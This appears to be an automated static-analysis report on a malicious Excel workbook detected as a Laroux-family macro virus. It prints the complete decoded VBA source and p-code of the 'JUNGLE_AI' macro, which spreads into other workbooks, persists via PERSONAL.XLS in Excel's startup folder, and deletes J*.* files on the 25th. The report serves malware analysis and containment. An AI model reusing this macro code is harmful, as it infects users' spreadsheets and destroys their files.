Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bdd4aad1f56c953c…

MALICIOUS

Office (OLE)

34.0 KB Created: 2000-08-30 21:06:57 Authoring application: Microsoft Excel First seen: 2012-06-28
MD5: e88a6c46c0f7aba16df414fd4fe1a14d SHA-1: 5fe6775d18435e66d218fb49711eb74f92b8b5ac SHA-256: bdd4aad1f56c953cc7e043808a0a44765376c0ba77c03bd1b690876211e0e7d5
236 Risk Score

Heuristics 6

  • ClamAV: Xls.Trojan.Laroux-24 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-24 — a signature for the Laroux family of resident Excel macro viruses. The PERSONAL.XLS/XLSTART persistence and sheet-copy replication visible in the extracted macro are consistent with that family, so treat this as a true positive rather than a generic heuristic hit.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    auto_close, when the closing workbook already carries the JUNGLE_AI sheet and no PERSONAL.XLS exists in Application.StartupPath (the Excel XLSTART folder), blanks the workbook's Title/Subject/Author/Keywords/Comments, hides its window and saves it with SaveAs to Application.StartupPath & "\PERSONAL.XLS", so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Note that the matched line below is only the ChDir into the startup folder; the persistence call itself is the Workbooks(N1$).SaveAs that follows it. PERSONAL.XLS is also the usual name of Excel's legitimate Personal Macro Workbook, so the file name alone is not an indicator — the JUNGLE_AI sheet/module inside it is. Containment: check every user's XLSTART folder for a PERSONAL.XLS containing a JUNGLE_AI sheet; removing the original attachment alone does not clear the infection.
    Matched line in script
    ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    auto_close ends by setting Application.OnSheetActivate = "PERSONAL.XLS!JUNGLE_AI", so the resident copy is invoked on every sheet activation. The procedure that name resolves to is not among the two Subs in the extracted module (auto_open, auto_close), so what the hook actually executes cannot be confirmed from this listing. The replication that IS visible happens in auto_close itself: when the closing workbook's first sheet is not JUNGLE_AI, the JUNGLE_AI sheet is copied from the loaded PERSONAL.XLS in front of it and hidden, so every workbook closed while the resident copy is loaded gets infected; conversely a carrier workbook infects an existing clean PERSONAL.XLS. The matched line below is the hook being cleared; the install is the later assignment of "PERSONAL.XLS!JUNGLE_AI".
    Matched line in script
    Application.OnSheetActivate = ""
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro — runs on every open of an infected workbook and carries the trigger payload: when the first two characters of the string form of the current date are "25" (the 25th of the month under a day-first date format; whether it fires depends on the host's regional settings) it executes Kill "J*.*", deleting every file matching J*.* in Excel's current directory, and when the string form of the time starts with "18", "6:" or "06" it displays the message box "VIRUS JUNGLE_AI". The "low" rating reflects only the auto-execution trigger, not this destructive payload.
    Matched line in script
    Sub auto_open()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro — runs whenever a workbook is closed and is the virus's replication and persistence routine (see the XLSTART and workbook-infection findings above). It runs under On Error Resume Next, so every failure (PERSONAL.XLS not loaded, read-only startup folder, protected workbook) is silently ignored.
    Matched line in script
    Sub auto_close()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7692 bytes
SHA-256: a92c3986b37b8338245f1753128a144ce35a664c0b854873a6bb5494cdc14242
Detection
ClamAV: Xls.Trojan.Laroux-24
Obfuscation or payload: unlikely — the macro is plain recorded-style VBA with no string encoding, no downloads and no embedded second-stage binary. This field does not measure the destructive action itself: the Kill "J*.*" in auto_open is in clear text.
Preview script
First 1,000 lines of the extracted script. The listing is the decompressed VBA source followed by a p-code disassembly of the same module stream (_VBA_PROJECT_CUR/VBA/JUNGLE_AI). The two agree in control flow, calls and string literals, which argues against VBA stomping (source/p-code mismatch); a few builtin names in the disassembly (e.g. `New` where the source has `.Name`, `LBound` for `Left`, `Set` for `.Select`) appear to be disassembler name-resolution artifacts rather than real differences — verify before relying on the source alone.
' Module named JUNGLE_AI. The same name is used for the sheet the virus copies
' between workbooks and as the OnSheetActivate target. Presumably an Excel 5/95-era
' module sheet (the project stream is _VBA_PROJECT_CUR) -- TODO confirm sheet type.
Attribute VB_Name = "JUNGLE_AI"

'
' Trigger/payload routine; runs automatically when an infected workbook is opened.
' No replication happens here -- that is all in auto_close.
Sub auto_open()
Attribute auto_open.VB_Description = "Macro recorded 09/02/1999 by pkgaim"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n0"
' Date trigger: the first two characters of the string form of today's date.
' "25" presumably means the 25th of any month under a day-first date format;
' under other regional formats the test may never be true.
I = Date
P$ = Str(I)
P1$ = Left(P$, 2)
If P1$ = "25" Then
' Destructive payload: deletes every file matching J*.* in Excel's current
' directory (no directory is set explicitly, so this is wherever CurDir points).
Kill "J*.*"
Else
End If
' Time trigger: first two characters of the string form of the current time,
' presumably the hour -- 18:xx, "6:xx" or "06:xx".
T = TimeValue(Time)
X$ = Str(T)
M$ = Left(X$, 2)
If M$ = "18" Or M$ = "6:" Or M$ = "06" Then
' Announcement: the only visible symptom of the infection.
MsgBox ("VIRUS JUNGLE_AI")
Else
End If
End Sub

' Infection + persistence routine; runs automatically whenever a workbook is closed.
' Three cases, decided by whether the closing workbook already carries the virus
' sheet and whether a PERSONAL.XLS already exists in the XLSTART folder:
'   1. closing workbook is clean        -> infect it from the loaded PERSONAL.XLS
'   2. carrier + PERSONAL.XLS present   -> infect PERSONAL.XLS (if it is clean)
'   3. carrier + no PERSONAL.XLS        -> save this workbook as PERSONAL.XLS
' Finally it (re)installs the OnSheetActivate hook.
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
' Every failure (missing workbook, read-only file, protected sheet...) is swallowed.
On Error Resume Next
Application.ScreenUpdating = False
H$ = ActiveWorkbook.Name
' P$ is assigned but never read in this routine.
P$ = ActiveWorkbook.Path
' Infection marker: the virus sheet is always inserted as the first sheet.
S$ = Workbooks(H$).Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
' Case 1: copy the virus sheet from the resident PERSONAL.XLS into the closing
' workbook and hide it. Needs PERSONAL.XLS to be loaded; silently no-ops otherwise.
Workbooks("PERSONAL.XLS").Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks(H$).Sheets(1)
Workbooks(H$).Sheets("JUNGLE_AI").Visible = False
Else
' Closing workbook is a carrier: look for an existing PERSONAL.XLS in XLSTART.
ST$ = Application.StartupPath
PE$ = Dir(ST$ & "\" & "PERSONAL.XLS")
If PE$ = "PERSONAL.XLS" Then
C = 1
Else
C = 0
End If
Application.ScreenUpdating = False
If C = 1 Then
' Case 2: PERSONAL.XLS exists -- infect it unless its first sheet is already the
' virus sheet. Its window is toggled visible around the Copy (presumably because
' the copy into a hidden window would fail).
N$ = ActiveWorkbook.Name
S$ = Workbooks("PERSONAL.XLS").Sheets(1).Name
If S$ <> "JUNGLE_AI" Then
'SAVE AS------
Windows("PERSONAL.XLS").Visible = True
Workbooks(N$).Sheets("JUNGLE_AI").Copy BEFORE:=Workbooks("PERSONAL.XLS").Sheets(1)
Windows("PERSONAL.XLS").Visible = False
'--------------
Else
End If
Else
' Case 3 (persistence): no PERSONAL.XLS yet -- turn THIS workbook into it.
'SAVE AS NEW------
Application.ScreenUpdating = False
N$ = ActiveWorkbook.Name
Sheets("JUNGLE_AI").Visible = True
Sheets("JUNGLE_AI").Select
CUR$ = CurDir()
' Strip identifying document properties before the copy is written.
With ActiveWorkbook
        .Title = ""
       .Subject = ""
       .Author = ""
       .Keywords = ""
      .Comments = ""
  End With
N1$ = ActiveWorkbook.Name
ChDir Application.StartupPath
' Window hidden before saving, presumably so the saved PERSONAL.XLS opens
' invisibly at Excel startup.
ActiveWindow.Visible = False
' The actual persistence call: writes the carrier to <StartupPath>\PERSONAL.XLS.
' NOTE(review): SaveAs presumably also renames the open workbook, so the user's
' document now lives as PERSONAL.XLS in the startup folder -- confirm.
Workbooks(N1$).SaveAs Filename:=Application.StartupPath & "\" & "PERSONAL.XLS", FileFormat:=xlNormal, _
        Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
        , CreateBackup:=False
        ChDir CUR$

'--------------
End If
End If
' (Re)install the sheet-activation hook. "PERSONAL.XLS!JUNGLE_AI" does not name
' either Sub in this module; what it resolves to cannot be confirmed from this
' listing -- TODO confirm against the JUNGLE_AI sheet / other streams.
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "PERSONAL.XLS!JUNGLE_AI"
End Sub




' Processing file: /opt/analyzer/scan_staging/8caf4792f5c74c26be76c65c7db3d5cf.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/JUNGLE_AI - 5675 bytes
' Line #0:
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	FuncDefn (Sub auto_open())
' Line #3:
' 	Ld Date 
' 	St I 
' Line #4:
' 	Ld I 
' 	ArgsLd Str 0x0001 
' 	St P$ 
' Line #5:
' 	Ld P$ 
' 	LitDI2 0x0002 
' 	ArgsLd LBound 0x0002 
' 	St P1$ 
' Line #6:
' 	Ld P1$ 
' 	LitStr 0x0002 "25"
' 	Eq 
' 	IfBlock 
' Line #7:
' 	LitStr 0x0004 "J*.*"
' 	ArgsCall Kill 0x0001 
' Line #8:
' 	ElseBlock 
' Line #9:
' 	EndIfBlock 
' Line #10:
' 	Ld Time 
' 	ArgsLd TimeValue 0x0001 
' 	St T 
' Line #11:
' 	Ld T 
' 	ArgsLd Str 0x0001 
' 	St X$ 
' Line #12:
' 	Ld X$ 
' 	LitDI2 0x0002 
' 	ArgsLd LBound 0x0002 
' 	St M$ 
' Line #13:
' 	Ld M$ 
' 	LitStr 0x0002 "18"
' 	Eq 
' 	Ld M$ 
' 	LitStr 0x0002 "6:"
' 	Eq 
' 	Or 
' 	Ld M$ 
' 	LitStr 0x0002 "06"
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #14:
' 	LitStr 0x000F "VIRUS JUNGLE_AI"
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' Line #15:
' 	ElseBlock 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	EndSub 
' Line #18:
' Line #19:
' 	FuncDefn (Sub auto_close())
' Line #20:
' 	OnError (Resume Next) 
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #22:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St H$ 
' Line #23:
' 	Ld ActiveWorkbook 
' 	MemLd Path 
' 	St P$ 
' Line #24:
' 	LitDI2 0x0001 
' 	Ld H$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemLd New 
' 	St S$ 
' Line #25:
' 	Ld S$ 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ne 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0001 
' 	Ld H$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ParamNamed BEFORE 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ArgsMemCall Copy 0x0001 
' Line #27:
' 	LitVarSpecial (False)
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ld H$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemSt Visible 
' Line #28:
' 	ElseBlock 
' Line #29:
' 	Ld Application 
' 	MemLd StartupPath 
' 	St ST$ 
' Line #30:
' 	Ld ST$ 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St PE$ 
' Line #31:
' 	Ld PE$ 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	Eq 
' 	IfBlock 
' Line #32:
' 	LitDI2 0x0001 
' 	St C 
' Line #33:
' 	ElseBlock 
' Line #34:
' 	LitDI2 0x0000 
' 	St C 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #37:
' 	Ld C 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #38:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N$ 
' Line #39:
' 	LitDI2 0x0001 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemLd New 
' 	St S$ 
' Line #40:
' 	Ld S$ 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ne 
' 	IfBlock 
' Line #41:
' 	QuoteRem 0x0000 0x000D "SAVE AS------"
' Line #42:
' 	LitVarSpecial (True)
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Windows 0x0001 
' 	MemSt Visible 
' Line #43:
' 	LitDI2 0x0001 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ParamNamed BEFORE 
' 	LitStr 0x0009 "JUNGLE_AI"
' 	Ld N$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	ArgsMemCall Copy 0x0001 
' Line #44:
' 	LitVarSpecial (False)
' 	LitStr 0x000C "PERSONAL.XLS"
' 	ArgsLd Windows 0x0001 
' 	MemSt Visible 
' Line #45:
' 	QuoteRem 0x0000 0x000E "--------------"
' Line #46:
' 	ElseBlock 
' Line #47:
' 	EndIfBlock 
' Line #48:
' 	ElseBlock 
' Line #49:
' 	QuoteRem 0x0000 0x0011 "SAVE AS NEW------"
' Line #50:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #51:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N$ 
' Line #52:
' 	LitVarSpecial (True)
' 	LitStr 0x0009 "JUNGLE_AI"
' 	ArgsLd Sheets 0x0001 
' 	MemSt Visible 
' Line #53:
' 	LitStr 0x0009 "JUNGLE_AI"
' 	ArgsLd Sheets 0x0001 
' 	ArgsMemCall Set 0x0000 
' Line #54:
' 	ArgsLd CurDir 0x0000 
' 	St CUR$ 
' Line #55:
' 	StartWithExpr 
' 	Ld ActiveWorkbook 
' 	With 
' Line #56:
' 	LitStr 0x0000 ""
' 	MemStWith Title 
' Line #57:
' 	LitStr 0x0000 ""
' 	MemStWith Subject 
' Line #58:
' 	LitStr 0x0000 ""
' 	MemStWith Author 
' Line #59:
' 	LitStr 0x0000 ""
' 	MemStWith Keywords 
' Line #60:
' 	LitStr 0x0000 ""
' 	MemStWith Comments 
' Line #61:
' 	EndWith 
' Line #62:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N1$ 
' Line #63:
' 	Ld Application 
' 	MemLd StartupPath 
' 	ArgsCall ChDir 0x0001 
' Line #64:
' 	LitVarSpecial (False)
' 	Ld ActiveWindow 
' 	MemSt Visible 
' Line #65:
' 	LineCont 0x0008 14 00 08 00 1F 00 08 00
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000C "PERSONAL.XLS"
' 	Concat 
' 	ParamNamed Filename 
' 	Ld xlNormal 
' 	ParamNamed FileFormat 
' 	LitStr 0x0000 ""
' 	ParamNamed Password 
' 	LitStr 0x0000 ""
' 	ParamNamed WriteResPassword 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnlyRecommended 
' 	LitVarSpecial (False)
' 	ParamNamed CreateBackup 
' 	Ld N1$ 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemCall SaveAs 0x0006 
' Line #66:
' 	Ld CUR$ 
' 	ArgsCall ChDir 0x0001 
' Line #67:
' Line #68:
' 	QuoteRem 0x0000 0x000E "--------------"
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	EndIfBlock 
' Line #71:
' 	LitStr 0x0000 ""
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #72:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #73:
' 	LitStr 0x0016 "PERSONAL.XLS!JUNGLE_AI"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #74:
' 	EndSub 
' Line #75:
' Line #76:
' Line #77: